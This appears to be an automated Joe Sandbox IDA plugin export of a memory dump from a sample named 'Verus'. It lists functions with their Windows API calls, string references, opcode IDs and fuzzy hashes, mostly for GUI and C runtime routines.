Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$Text$ItemLongParent$InfoParametersRectSystem
String ID:
API String ID: 624365159-0
Opcode ID: f567429c32c27441b210543bb3c60716de7df838285ac966771398d31b1c61cb
Instruction ID: d2a39419ba7f2e43f6149fd78b8148bd40004a6e0dfb53148d7b2f28546bb2b3
Opcode Fuzzy Hash: f567429c32c27441b210543bb3c60716de7df838285ac966771398d31b1c61cb
Instruction Fuzzy Hash: 23F049B2300100ABD244EB69CC95E6AB3ADAFC8305B00481EB249C7291DA68A8518BA9

Function 0043EC30 Relevance: 6.0, APIs: 4, Instructions: 37windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0043EC47
TranslateMessage.USER32(?), ref: 0043EC65
DispatchMessageW.USER32(?), ref: 0043EC6C
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0043EC7B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: 0ff7b4cad211cdbc9ccdbc25d2f9482f393b822d5df4aa0185ca26e28aceb832
Instruction ID: dc7e1638a66759f4a4c1769c4cfdd7f0db0448b10ee485b218b2867609a7563e
Opcode Fuzzy Hash: 0ff7b4cad211cdbc9ccdbc25d2f9482f393b822d5df4aa0185ca26e28aceb832
Instruction Fuzzy Hash: 3EF08236651304BAE520EB599E82FDB73AC9B88B10F505816B700A60C0D6B4E5058BBA

Function 00466D40 Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000002), ref: 00466D50
IsWindowEnabled.USER32(00000000), ref: 00466D53
GetDlgItem.USER32(?,000003FA), ref: 00466D98
ShowWindow.USER32(00000000,00000000), ref: 00466D9D

Part of subcall function 004431E0: MessageBoxW.USER32(?,?,?,?), ref: 00443271

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemWindow$EnabledMessageShow
String ID:
API String ID: 1016247931-0
Opcode ID: 008397036d10dcfe63d6de97bc5fdbda3c366ca7f69663b7298ec6672c801efa
Instruction ID: e14f9a7d34646a08e431e39488826a2eecbe10ee04a7fffdee93048f5fae019e
Opcode Fuzzy Hash: 008397036d10dcfe63d6de97bc5fdbda3c366ca7f69663b7298ec6672c801efa
Instruction Fuzzy Hash: 26F0CD717003006BE630AB299D49F9776A99BC4B00F05081AF256872C1CAA8A940C669

Function 00462730 Relevance: 6.0, APIs: 4, Instructions: 36windowCOMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32(?,00000489), ref: 00462743
IsDlgButtonChecked.USER32(?,00000498), ref: 0046275A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0046277A
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00462788

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ButtonCheckedMessageSend
String ID:
API String ID: 1078019629-0
Opcode ID: d9374c589501ced0c78985a213f9400e0b0375a9f519408c0e1dce1cf98778ce
Instruction ID: b06064d47b1b03d5db111b91a4cac643df92999b3a7d89a1b3a4c7cbdf695948
Opcode Fuzzy Hash: d9374c589501ced0c78985a213f9400e0b0375a9f519408c0e1dce1cf98778ce
Instruction Fuzzy Hash: DFF0547B244740ABD1509778AD81F5AB7A8ABD4B10F158929F344DB2E0C5B4A402CB64

Function 0049ADCB Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0049ADD7

Part of subcall function 004973CA: __getptd_noexit.LIBCMT ref: 004973CD
Part of subcall function 004973CA: __amsg_exit.LIBCMT ref: 004973DA

__getptd.LIBCMT ref: 0049ADEE
__amsg_exit.LIBCMT ref: 0049ADFC
__lock.LIBCMT ref: 0049AE0C

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 6dd8e20a95da56bb13107f80fd9ea0434cb9d737d2940ce3b3082044a8b59c50
Instruction ID: 3d54166888436828958bafea459290fde1259b0247fdf835deaeaf6aaa217ffb
Opcode Fuzzy Hash: 6dd8e20a95da56bb13107f80fd9ea0434cb9d737d2940ce3b3082044a8b59c50
Instruction Fuzzy Hash: 01F062315542148BDF20BB69840675E7FA09B40724F14457FE840576D2CB7C5911DBDF

Function 0045EA70 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(?,000000D8), ref: 0045EA88
ImageList_Create.COMCTL32(00000010,00000010,00000020,00000000,00000006), ref: 0045EA9A
ImageList_Add.COMCTL32(00000000,00000000,00000000), ref: 0045EAA7
DeleteObject.GDI32(00000000), ref: 0045EAAE
LoadBitmapW.USER32(?,000000D9), ref: 0045EAC3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000000,00000006), ref: 0045EAD5
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 0045EAE5
DeleteObject.GDI32(00000000), ref: 0045EAEC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ImageList_$BitmapCreateDeleteLoadObject$Masked
String ID:
API String ID: 185868847-0
Opcode ID: 40e22923162698c57614d01871011e6c4106bb22566e9825c717123efb691fa4
Instruction ID: c6a47cc74c3f5d3403ff341fdc74494ef4d5fc3e7f8e207370cb6f1d96e479cf
Opcode Fuzzy Hash: 40e22923162698c57614d01871011e6c4106bb22566e9825c717123efb691fa4
Instruction Fuzzy Hash: EAE01A32681310BBD6A45BA6BD1DF8A3AA8BB99B52F010425B342AB1D0C7B9544487AC

Function 00466CF0 Relevance: 6.0, APIs: 4, Instructions: 22windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00466CFA
EnableWindow.USER32(?,00000001), ref: 00466D0D
DestroyWindow.USER32(?), ref: 00466D17
PostQuitMessage.USER32(?), ref: 00466D2D

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$DestroyEnableMessagePostQuit
String ID:
API String ID: 2591492936-0
Opcode ID: af065649a811754cf372e87a81d0e8a90db6954af0e9eb2b2812c7c41f8b4fb4
Instruction ID: 43c59e51a2d19e35ac02c64a169937c4f35532f248eae98aedc3bbf13077fe2b
Opcode Fuzzy Hash: af065649a811754cf372e87a81d0e8a90db6954af0e9eb2b2812c7c41f8b4fb4
Instruction Fuzzy Hash: 9EE01A75605350ABC3609BB4E95CF97B7F8AB88701F218819B586D6290DBBCD840CB68

Function 0040C380 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 389COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 0040C3D7

Part of subcall function 00402A30: std::runtime_error::runtime_error.LIBCPMTD ref: 00402A3E

__CxxThrowException@8.LIBCMT ref: 0040C3E5

Part of subcall function 00491365: RaiseException.KERNEL32(?,?,00491A41,004024C5,?,?,?,?,00491A41,004024C5,004E76D0,0053A2B8,004024C5,00000000,00000000), ref: 004913A7

Strings

map/set<T> too long, xrefs: 0040C3BC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
String ID: map/set<T> too long
API String ID: 212174158-1285458680
Opcode ID: b78628e9f19a5f7435f11d3ecf1d2c12953ccbdd47e06cea5b8dd6a656c3b490
Instruction ID: 8716c3e4a3e6dd30733a3aad8faa51a373d14db20188e72f34937d68a858a85e
Opcode Fuzzy Hash: b78628e9f19a5f7435f11d3ecf1d2c12953ccbdd47e06cea5b8dd6a656c3b490
Instruction Fuzzy Hash: 23E18CF5D001449FCB04EBA1E88296F7375AF88308F20457DF4066B396EA39F905CBA6

Function 00411170 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 389COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 004111C7

Part of subcall function 00402A30: std::runtime_error::runtime_error.LIBCPMTD ref: 00402A3E

__CxxThrowException@8.LIBCMT ref: 004111D5

Part of subcall function 00491365: RaiseException.KERNEL32(?,?,00491A41,004024C5,?,?,?,?,00491A41,004024C5,004E76D0,0053A2B8,004024C5,00000000,00000000), ref: 004913A7

Strings

map/set<T> too long, xrefs: 004111AC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
String ID: map/set<T> too long
API String ID: 212174158-1285458680
Opcode ID: 683476f93821d143f5180634a31418b066dfb84dd884719bae3e3a486f6ec2c5
Instruction ID: f74b6ec97a9a4e0699857788b44ee47587ffe02e9060b2a3c447344e9890ffc3
Opcode Fuzzy Hash: 683476f93821d143f5180634a31418b066dfb84dd884719bae3e3a486f6ec2c5
Instruction Fuzzy Hash: CCE182F5D001449FDB04EBA1E8819AF7375AF99348F24447DF5066B392EA39F900CBA6

Function 004071D0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 389COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 00407227

Part of subcall function 00402A30: std::runtime_error::runtime_error.LIBCPMTD ref: 00402A3E

__CxxThrowException@8.LIBCMT ref: 00407235

Part of subcall function 00491365: RaiseException.KERNEL32(?,?,00491A41,004024C5,?,?,?,?,00491A41,004024C5,004E76D0,0053A2B8,004024C5,00000000,00000000), ref: 004913A7

Strings

map/set<T> too long, xrefs: 0040720C

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
String ID: map/set<T> too long
API String ID: 212174158-1285458680
Opcode ID: d22404a3946d5d8787dab5a85f1fef018561e8ac46c641fa7d54830beba910b9
Instruction ID: 8a5ec0072048ba1f74f165a76c15590e4b2b1bf601bda86e1b62d5d710fffb3e
Opcode Fuzzy Hash: d22404a3946d5d8787dab5a85f1fef018561e8ac46c641fa7d54830beba910b9
Instruction Fuzzy Hash: 2AE16CF5D041449FDB04EBA1E88196F7375AF99348F24447EE4026B392EA39F900CBA7

Function 0042C800 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042C832

Part of subcall function 0042E510: _memset.LIBCMT ref: 0042E828
Part of subcall function 0042E510: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0042E8A1
Part of subcall function 0042E510: ResetEvent.KERNEL32(00000000), ref: 0042E8AA
Part of subcall function 0042E510: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,0000005C,?,?,?), ref: 0042E8C8
Part of subcall function 0042E510: CloseHandle.KERNEL32(00000000,?,00000000,0000005C,?,?,?), ref: 0042E8CF
Part of subcall function 0042E510: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,0000005C,?,?,?), ref: 0042E8DC

Strings

Z, xrefs: 0042C860
U, xrefs: 0042C996

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Event_memset$CloseCreateErrorHandleLastObjectResetSingleWait
String ID: U$Z
API String ID: 2903298208-4016073733
Opcode ID: e91c26d259fda9e0bf0954ec647b907fef9efb18d17ef633496a8e5967f9f4ee
Instruction ID: 0eb077275df2e3755a522ac3923e1e35cb383db3e6bd886195c5d98a6db88cbc
Opcode Fuzzy Hash: e91c26d259fda9e0bf0954ec647b907fef9efb18d17ef633496a8e5967f9f4ee
Instruction Fuzzy Hash: 3161B26020C3D09ED311DB28945079FBFD16F8A718F484E5EF1CCAB282D6788649D76B

Function 00434780 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 004347F0

Part of subcall function 0041C630: GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 0041C666
Part of subcall function 0041C630: FlushInstructionCache.KERNEL32(00000000), ref: 0041C66D
Part of subcall function 0041C630: DialogBoxParamW.USER32(?,000000E7,000000E9,Function_000166E0,?), ref: 0041C69D

SetDlgItemTextW.USER32(?,00000408,?), ref: 0043490E

Strings

%d kB/s (CD: %dx, DVD: %dx), xrefs: 004348F2

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ActiveCacheCurrentDialogFlushInstructionItemParamProcessTextWindow
String ID: %d kB/s (CD: %dx, DVD: %dx)
API String ID: 1609061356-3702500704
Opcode ID: e4c5e01cc79ad3c477bd94d78f2e07c3d6796ec948a57199dd9ead440a3499d4
Instruction ID: 4b320975d7ad4c1ca19564b26a0849ec6d704ea9e8779892e867bbbe8868aaa0
Opcode Fuzzy Hash: e4c5e01cc79ad3c477bd94d78f2e07c3d6796ec948a57199dd9ead440a3499d4
Instruction Fuzzy Hash: F7419CB0208341CBD354DF26D941BABB7E4FFC8714F104D2EF89586291E739A84ACB56

Function 004651E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00478830: _memset.LIBCMT ref: 00478878
Part of subcall function 00478830: lstrcpyW.KERNEL32(?,Root,?,?,?,?,?,?,?,004C046B,000000FF), ref: 004788B0

Part of subcall function 00464FD0: SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?,AD5E0258,00000000,00539B04,00465240,?,00000000,AD5E0258,?,?), ref: 00465005

Part of subcall function 00477440: _vswprintf_s.LIBCMT ref: 00477459

MessageBoxW.USER32(00000000,?,00000000,00000030), ref: 00465296

Strings

Settings, xrefs: 004652E1
FeyWriter, xrefs: 004652B7

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: FolderMessagePath_memset_vswprintf_slstrcpy
String ID: FeyWriter$Settings
API String ID: 3821307947-2470204058
Opcode ID: d8bb40611d7ec7c53fd3f6c2e5b1c35f66b33afc147f36af6faed49749719585
Instruction ID: 9a882b60f409d70cb1208c77e371a3e7f79b078cd50f1654ef9ff66e99df42d5
Opcode Fuzzy Hash: d8bb40611d7ec7c53fd3f6c2e5b1c35f66b33afc147f36af6faed49749719585
Instruction Fuzzy Hash: 3B41C3711047419BC730EF24D852BABB3E4AB91718F444A1EE49A832C1EF38A508CA5B

Function 00404480 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00404440: allocator.LIBCPMTD ref: 0040444C

allocator.LIBCPMTD ref: 00404528

Strings

:@, xrefs: 004044A0
:@, xrefs: 004045A2

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: allocator
String ID: :@$:@
